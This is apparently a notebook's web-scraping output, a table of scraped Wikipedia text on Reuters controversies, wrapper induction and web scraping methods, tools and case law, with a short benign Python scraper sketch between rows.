43 44 45 In response to that, Reuters' then-managing director, Gerald Long, had asked for evidence of the charges, but none was provided, according to Reuters' then-managing editor for North America, 45 Desmond Maberly. 46 47 Reuters has a policy of taking a "value-neutral approach" which extends to not using the word terrorist in its stories. The practice attracted criticism following the September 11 attacks. 48 Reuters' editorial policy states: "Reuters may refer without attribution to terrorism and counterterrorism in general, but do not refer to specific events as terrorism. Nor does Reuters use the word terrorist without attribution to qualify specific individuals, groups or events. 49 By contrast, the Associated Press does use the term terrorist in reference to non-governmental organizations who carry out attacks on civilian populations. 48 In 2004, Reuters asked CanWest Global Communications, a Canadian newspaper chain, to remove Reuters' bylines, as the chain had edited Reuters articles to insert the word terrorist. A spokesman for Reuters stated: "My goal is to protect my reporters and protect our editorial integrity. 50 In July 2013, David Fogarty, former Reuters climate change correspondent in Asia, resigned after a career of almost 20 years with the company and wrote that "progressively, getting any climate change-themed story published got harder" following comments from then-deputy editor-in-chief Paul Ingrassia that he was a "climate change sceptic". In his comments, Fogarty stated: 51 52 53 By mid-October, I was informed that climate change just wasn't a big story for the present, but that it would be if there was a significant shift in global policy, such as the US introducing an emissions cap-and-trade system. Very soon after that conversation I was told my climate change role was abolished. Ingrassia, formerly Reuters' managing editor, previously worked for The Wall Street Journal and Dow Jones for 31 years. 54 55 Reuters responded to Fogarty's piece by stating: "Reuters has a number of staff dedicated to covering this story, including a team of specialist reporters at Point Carbon and a columnist. There has been no change in our editorial policy. 56 Subsequently, climate blogger Joe Romm cited a Reuters article on climate as employing "false balance", and quoted Stefan Rahmstorf, co-chair of Earth System Analysis at the Potsdam Institute that s imply, a lot of unrelated climate sceptics nonsense has been added to this Reuters piece. In the words of the late Steve Schneider, this is like adding some nonsense from the Flat Earth Society to a report about the latest generation of telecommunication satellites. It is absurd. Romm opined: "We can't know for certain who insisted on cramming this absurd and non-germane 'climate sceptics nonsense' into the piece, but we have a strong clue. If it had been part of the reporter's original reporting, you would have expected direct quotes from actual sceptics, because that is journalism 101. The fact that the blather was all inserted without attribution suggests it was added at the insistence of an editor. 57 According to Ynetnews, Reuters was accused of bias against Israel in its coverage of the 2006 Israel Lebanon conflict after the wire service used two doctored photos by a Lebanese freelance photographer, Adnan Hajj. 58 In August 2006, Reuters announced it had severed all ties with Hajj and said his photographs would be removed from its database. 
59 60 In 2010, Reuters was criticised again by Haaretz for "anti-Israeli" bias when it cropped the edges of photos, removing commandos' knives held by activists and a naval commando's blood from photographs taken aboard the Mavi Marmara during the Gaza flotilla raid, a raid that left nine Turkish activists dead. It has been alleged that in two separate photographs, knives held by the activists were cropped out of the versions of the pictures published by Reuters. 61 Reuters said it is standard operating procedure to crop photos at the margins, and replaced the cropped images with the original ones after it was brought to the agency's attention. 61 On 9 June 2020, three Reuters journalists (Jack Stubbs, Raphael Satter and Christopher Bing) incorrectly used the image of an Indian herbal medicine entrepreneur in an exclusive story titled "Obscure Indian cyber firm spied on politicians, investors worldwide". 62 Indian local media picked up the report, and the man whose image was wrongly used was invited and interrogated for nine hours by Indian police. Reuters admitted to the error, but Raphael Satter claimed that they had mistaken the man for the suspected hacker Sumit Gupta because both men share same business address. A check by local media, however, showed that both men were in different buildings and not as claimed by Raphael Satter. 63 64 As the report of the inaccurate reporting trickled out to the public, Reuters' senior director of communication Heather Carpenter contacted media outlets asking them to take down their posts. 64 In March 2015, the Brazilian affiliate of Reuters released an excerpt from an interview with Brazilian ex-president Fernando Henrique Cardoso about Operation Car Wash (Portuguese: Opera o Lava Jato). In 2014, several politicians from Brazil were found to be involved in corruption, by accepting bribes from different corporations in exchange for Government contracts. After the scandal, the excerpt from Brazil's president Fernando Henrique's interview was released. One paragraph by a former Petrobras manager mentioned a comment, in which he suggested corruption in the company may date back to Cardoso's presidency. Attached, was a comment between parenthesis: "Podemos tirar se achar melhor" ("we can take it out if you think better"), 65 which was removed from the current version of the text. 66 This had the effect of confusing readers, and suggests that the former president was involved in corruption and the comment was attributed to him. Reuters later confirmed the error, and explained that the comment, originating from one of the local editors, was actually intended for the journalist who wrote the original text in English, and that it should not have been published. 67 In November 2019 the UK Foreign Office released archive documents confirming that it had provided funding to Reuters during the 1960s and 1970s so that Reuters could expand its coverage in the Middle East. An agreement was made between the Information Research Department (IRD) and Reuters for the UK Treasury to provide 350,000 over four years to fund Reuters' expansion. The UK government had already been funding the Latin American department of Reuters through a shell company; however, this method was discounted for the Middle East operation due to the accounting of the shell company looking suspicious, with the IRD stating that the company "already looks queer to anyone who might wish to investigate why such an inactive and unprofitable company continues to run. 
68 Instead, the BBC was used to fund the project by paying for enhanced subscriptions to the news organisation, for which the Treasury would reimburse the BBC at a later date. The IRD acknowledged that this agreement would not give them editorial control over Reuters, although the IRD believed it would give them political influence over Reuters' work, stating "this influence would flow, at the top level, from Reuters' willingness to consult and to listen to views expressed on the results of its work. 68 69 On 1 June 2020, Reuters announced that Russian news agency TASS had joined its "Reuters Connect" programme, comprising a then-total of 18 partner agencies. Reuters president Michael Friedenberg said he was "delighted that TASS and Reuters are building upon our valued partnership". 70 Two years later, TASS's membership in Reuters Connect came under scrutiny in the wake of the 2022 Russian invasion of Ukraine; Politico reported that Reuters staff members were "frustrated and embarrassed" that their agency had not suspended its partnership with TASS. 71 On 23 March 2022, Reuters removed TASS from its "content marketplace". Matthew Keen, interim CEO of Reuters said "we believe making TASS content available on Reuters Connect is not aligned with the Thomson Reuters Trust Principles". 72 1 2 3 4 5 6 7 NBC News Wall Street Journal Politico MSNBC CNBC Telemundo Bloomberg Industry Group Washington Examiner Boston Globe Washington Blade Fox News CBS News Radio AP Radio PBS VOA Time Yahoo News Daily Caller EWTN CBS News Bloomberg News McClatchy NY Post TheGrio Washington Times Salem Radio CBN Cheddar News Hearst TV AP NPR Foreign pool The Hill Regionals Newsmax Gray TV Spectrum News ABC News Washington Post Agence France-Presse Fox Business Fox News Radio CSM Roll Call Al JazeeraNexstar Scripps News Reuters NY Times LA Times Univision AURN RealClearPolitics Daily Beast Dallas Morning News BBC Newsweek CNN USA Today ABC News RadioDaily Mail National JournalHuffPostFinancial Times The Guardian |
2 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Wrapper_(data_mining) | Wrapper in data mining is a procedure that extracts regular subcontent of an unstructured or loosely-structured information source and translates it into a relational form, so it can be processed as structured data. 1 Wrapper induction is the problem of devising extraction procedures on an automatic basis, with minimal reliance on hand-crafted rules. Many web pages are automatically generated from structured data telephone directories, product catalogs, etc. wrapped in a loosely structured presentation language (usually some variant of HTML), formatted for human browsing and navigation. Structured data are typically descriptions of objects retrieved from underlying databases and displayed in web pages following fixed templates at a low level, injected into pages where the high-level structure can vary from week to week, per the rapidly evolving fashion of the site's presentation skin. The precise dividing line between the fluid high-level skin and the less fluid structured data templates is rarely documented for public consumption, outside of the content management team at the web property. Software systems using such resources must translate HTML content into a relational form. Wrappers are commonly used as such translators. Formally, a wrapper is a function from a page to the set of tuples it contains. There are two main approaches to wrapper generation: wrapper induction and automated data extraction. Wrapper induction uses supervised learning to learn data extraction rules from manually labeled training examples. The disadvantages of wrapper induction are Due to the manual labeling effort, it is hard to extract data from a large number of sites as each site has its own templates and requires separate manual labeling for wrapper learning. Wrapper maintenance is also a major issue because whenever a site changes the wrappers built for the site become obsolete. Due to these shortcomings, researchers have studied automated wrapper generation using unsupervised pattern mining. Automated extraction is possible because most Web data objects follow fixed templates. Discovering such templates or patterns enables the system to perform extraction automatically. 2 Wrapper generation on the Web is an important problem with a wide range of applications. Extraction of such data enables one to integrate data information from multiple Web sites to provide value-added services, e.g., comparative shopping, object search, and information integration. |
3 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#See_also | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular web scraping tools include BeautifulSoup, a Python library that provides simple methods for extracting data from HTML and XML files; Scrapy, an open-source and collaborative web crawling framework for Python that allows you to extract, process, and store data; Octoparse, a no-code web scraping tool that offers a user-friendly interface for extracting data from websites without programming skills; ParseHub, another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites; Apify, a platform that offers a wide range of scraping tools and the ability to create custom scrapers; and InstantAPI.ai, an AI-powered tool that transforms any web page into personalized APIs, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. [6] The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. [7] In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattels. [8] However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, [9][10] which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved the automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. [11] One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. [12] AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. [13] Southwest Airlines has also challenged screen-scraping practices and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, arguing that the prevailing law, in this case, should be US copyright law and that, under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo, and Outtask was purchased by travel expense company Concur. [14] In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses, and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. [15] While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc. in the United States District Court for the Eastern District of Virginia, the court ruled that the terms of use should be brought to the users' attention in order for a browse-wrap contract or license to be enforced. 
[16] In a 2014 case filed in the United States District Court for the Eastern District of Pennsylvania, [17] e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. [18] QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's web site during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA), a uniform law that many believed was in favor of common browse-wrap contracting practices. [19] In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. [20][21] In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned it to the Ninth Circuit for reconsideration in light of the 2021 Supreme Court decision in Van Buren v. United States, which narrowed the applicability of the CFAA. [22] On this review, the Ninth Circuit upheld its prior decision. [23] The Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. [citation needed] In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. [24] In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court for the Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. [25] The decision is under appeal in Ireland's Supreme Court. 
[26] On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. [27] The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. [28] In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. [29][30] Leaving aside a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating terms of use that prohibit data scraping will be a violation of contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
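The scraped row above describes two basic extraction styles: regular-expression matching (for example, contact scraping of e-mail addresses) and DOM parsing of the fetched page. Below is a minimal sketch, not part of the original scrape output, that illustrates both using only libraries already imported in this notebook (requests, re, BeautifulSoup, urljoin); the target URL and the e-mail pattern are illustrative assumptions.
# Hedged sketch: fetch one page, then extract e-mail addresses (regex) and
# absolute link URLs (DOM parsing). The URL below is a placeholder.
import re
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

def scrape_contacts_and_links(url, timeout=10):
    """Return (emails, links) found on a single page."""
    response = requests.get(url, timeout=timeout)
    response.raise_for_status()
    html = response.text

    # "Contact scraping": a simple regex over the raw page text.
    emails = set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html))

    # DOM parsing: walk the parsed tree instead of the raw string.
    soup = BeautifulSoup(html, "html5lib")
    links = {urljoin(url, a["href"]) for a in soup.find_all("a", href=True)}

    return emails, links

if __name__ == "__main__":
    found_emails, found_links = scrape_contacts_and_links("https://example.com")
    print(f"{len(found_emails)} e-mail addresses, {len(found_links)} links")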
4 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-21 | (page text identical to row 3) |
5 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping | (page text identical to row 3) |
6 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#References | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. 
A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. 
Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. 
However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA) and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's web-search software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" to Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the website's user agreement. Outtask denied all these claims, arguing that the prevailing law in this case should be US copyright law and that, under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo!, and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking were sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore an emerging pattern that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system, and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public website should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in Cvent, Inc. v. Eventbrite, Inc., the United States District Court for the Eastern District of Virginia ruled that the terms of use must be brought to the users' attention in order for a browse-wrap contract or license to be enforced.
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200-300 search requests to QVC's website per minute, sometimes up to 36,000 requests per minute), which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of its website, which QVC claims was caused by Resultly. On the plaintiff's website during the period of this trial, the terms-of-use link was displayed among all the links of the site, at the bottom of the page, as on most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor of common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the 